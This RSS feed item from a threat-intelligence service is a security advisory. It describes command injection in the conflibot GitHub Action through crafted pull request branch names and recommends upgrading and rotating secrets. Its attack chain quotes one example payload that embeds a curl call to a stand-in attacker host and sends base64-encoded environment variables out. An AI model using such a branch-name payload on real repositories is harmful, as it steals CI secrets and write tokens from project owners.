<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:webfeeds="http://webfeeds.org/rss/1.0"><channel><title>Wktk - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/vendors/wktk/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 17 Aug 2026 18:46:12 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/vendors/wktk/feed.xml" rel="self" type="application/rss+xml"/><image><url>https://feed.craftedsignal.io/favicon-32x32.png</url><title>CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/</link><width>32</width><height>32</height></image><webfeeds:icon>https://feed.craftedsignal.io/favicon.svg</webfeeds:icon><item><title>Command Injection in conflibot via Crafted Git Branch Names</title><link>https://feed.craftedsignal.io/briefs/2026-08-conflibot-command-injection/</link><pubDate>Mon, 17 Aug 2026 18:46:12 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-08-conflibot-command-injection/</guid><description>The conflibot GitHub Action (versions &lt; 1.2.1) is vulnerable to command injection via attacker-controlled pull request branch names, leading to secret exfiltration when executed via pull_request_target.</description><content:encoded><![CDATA[<p>conflibot is a GitHub Action designed to manage and synchronize configuration files. A critical vulnerability (CVE-2026-55158) exists in versions prior to 1.2.1 where git commands are constructed using string interpolation and executed via a shell. Because the action accepts pull request branch names as inputs, an attacker can create a pull request with a maliciously crafted branch name containing shell metacharacters such as backticks, dollar signs, or semicolons.</p>
<p>When configured with the <code>pull_request_target</code> event, the GitHub Actions runner executes this malicious code with the base repository's context. This grants the attacker access to repository secrets and a write-scoped <code>GITHUB_TOKEN</code>. Exploitation requires no maintainer interaction and can be performed by any user capable of opening a pull request, including from a fork. This vulnerability allows for immediate secret exfiltration, unauthorized commits to the repository, or lateral movement within the CI/CD pipeline.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a target repository utilizing <code>wktk/conflibot</code> versions prior to 1.2.1 in a workflow triggered by <code>pull_request_target</code>.</li>
<li>Attacker creates a fork of the target repository.</li>
<li>Attacker creates a new branch in the fork with a name containing shell injection payloads (e.g., <code>$(curl attacker.com/$(env | base64))</code>).</li>
<li>Attacker opens a pull request from the malicious branch to the target repository.</li>
<li>The target repository's CI workflow is triggered by the <code>pull_request_target</code> event.</li>
<li>conflibot invokes the vulnerable shell command, interpolating the malicious branch name into the command string.</li>
<li>The runner executes the injected command with the privileges of the repository's <code>GITHUB_TOKEN</code>.</li>
<li>Attacker captures exfiltrated secrets or uses the write token to modify the repository source code.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows unauthenticated attackers to execute arbitrary commands on GitHub-hosted runners. This results in the compromise of repository secrets, exposure of environment variables, and the ability to push malicious code to the base repository. Given the nature of <code>pull_request_target</code> workflows, this impacts any organization using conflibot to automate repository management, potentially affecting thousands of projects.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade <code>wktk/conflibot</code> to version 1.2.1 or 2.0.0 immediately.</li>
<li>Review workflows currently using <code>pull_request_target</code> for any usage of <code>wktk/conflibot</code> to assess potential prior secret compromise.</li>
<li>Rotate all repository secrets and personal access tokens that were accessible to the compromised workflow if the repository has been targeted.</li>
<li>If immediate patching is not possible, disable the affected workflow entirely until the upgrade can be performed.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category></item></channel></rss>